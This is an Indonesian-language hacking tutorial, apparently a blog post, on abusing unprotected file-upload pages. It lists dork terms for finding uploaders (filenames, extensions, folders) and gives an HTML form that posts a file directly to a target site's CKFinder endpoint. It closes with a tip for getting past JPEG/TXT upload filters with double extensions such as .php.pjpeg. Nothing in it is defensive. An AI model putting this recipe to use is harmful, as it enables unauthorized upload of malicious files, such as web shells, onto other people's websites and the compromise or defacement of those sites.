DORK Upload file Vulnerability

chmood
Bahan²

- Dork * upload.html

* Upload.htm

* Upload.php

* Upload.phtml

* Uploads.html

* Uploads.php 




<html >
<head>
    <title>./75n1</title>
</head>
<body>
<center>
<p style="font-weight:bold">Ustazah</p>
<img src="http://i.imgur.com/fl2HqAw.jpg" alt="gambar" class="bg" />
<br><br>
<form method="POST" action="http://target.com.net/admin/app/webroot/plugin/ckeditor/ckfinder/ckfinder.html"
enctype="multipart/form-data">
<input type="file" name="Filedata" /><button> Bantai !!!</button>
</form></center>
</body>
</html>
copy.html 

kalau belum punya


Bahan² untuk racik dork :

Filename :

- upload

- uploader

- uploadfile

- upload_file

- uploadform

- upload_form

- formupload

- form_upload

- fileupload

- file_upload

- fileuploader

- file_uploader

* Tambahin lagi kalo ada

File extension :

- .htm

- .html

- .php

- .phtml

- .asp

- .aspx

- .cgi

* Tambahin lagi kalo ada

Access folder :

- /upload

- /uploads

- /file

- /files

* Tambahin lagi kalo ada

Note :
kalo ketemu uploader yang JPEG, TXT itu jangan di skip,
biasanya bisa di bypass, .php.pjpeg, .php.txt


Komentar